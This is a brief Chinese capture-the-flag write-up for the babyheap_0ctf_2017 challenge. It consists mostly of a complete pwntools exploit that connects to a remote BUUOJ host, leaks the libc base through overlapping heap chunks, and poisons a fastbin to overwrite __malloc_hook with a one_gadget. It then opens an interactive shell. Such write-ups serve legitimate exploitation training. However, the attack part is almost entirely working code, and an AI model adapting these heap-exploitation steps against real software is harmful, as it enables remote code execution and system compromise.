主体函数
我们可以在fill里发现可以任意输入字节
接下来我们就用chunk extend和off by one
图片来自
https://bbs.pediy.com/thread-246786.htm
具体看exp
exp:
from pwn import *
#p=process('./babyheap_0ctf_2017')
e=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
p = remote('node3.buuoj.cn', 26497)
p.readuntil('Command:')
context(log_level='debug')
def alloc(a):
p.writeline('1')
p.readuntil('Size:')
p.writeline(str(a))
#p.readuntil('Command:')
def update(a,b,c):
p.writeline('2')
p.readuntil('Index:')
p.writeline(str(a))
p.readuntil('Size:')
p.writeline(str(b))
p.readuntil('Content:')
p.write(c)
p.readuntil('Command:')
def dele(a):
p.writeline('3')
p.readuntil('Index:')
p.writeline(str(a))
p.readuntil('Command:')
def show(a):
p.writeline('4')
p.readuntil('Index:')
p.writeline(str(a))
alloc(0x18) #0
alloc(0x18) #1
alloc(0x68) #2
alloc(0x68) #3
update(0, 0x20, 'a'*0x18+p64(0x91)) #size1+size2
dele(1) #1 #free1
alloc(0x18) #alloc1
show(2) #fd, bk at alloc2
#gdb.attach(p)
libcbase = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x3c4b78
log.info(hex(libcbase))
malloc_hook = libcbase + 0x3c4aed
log.info(hex(malloc_hook))
one = libcbase + 0x4526a
dele(2) #free2
#gdb.attach(p)
update(1, 0x28, 'a'*0x18+p64(0x71)+p64(malloc_hook)) #fd at 2->malloc_hook
#gdb.attach(p)
alloc(0x68) #2
#gdb.attach(p)
alloc(0x68) #4 at malloc_hook
#gdb.attach(p)
update(4, 0x1b, p8(2)*3+p64(2)*2+p64(one))
#gdb.attach(p)
alloc(255)
p.interactive()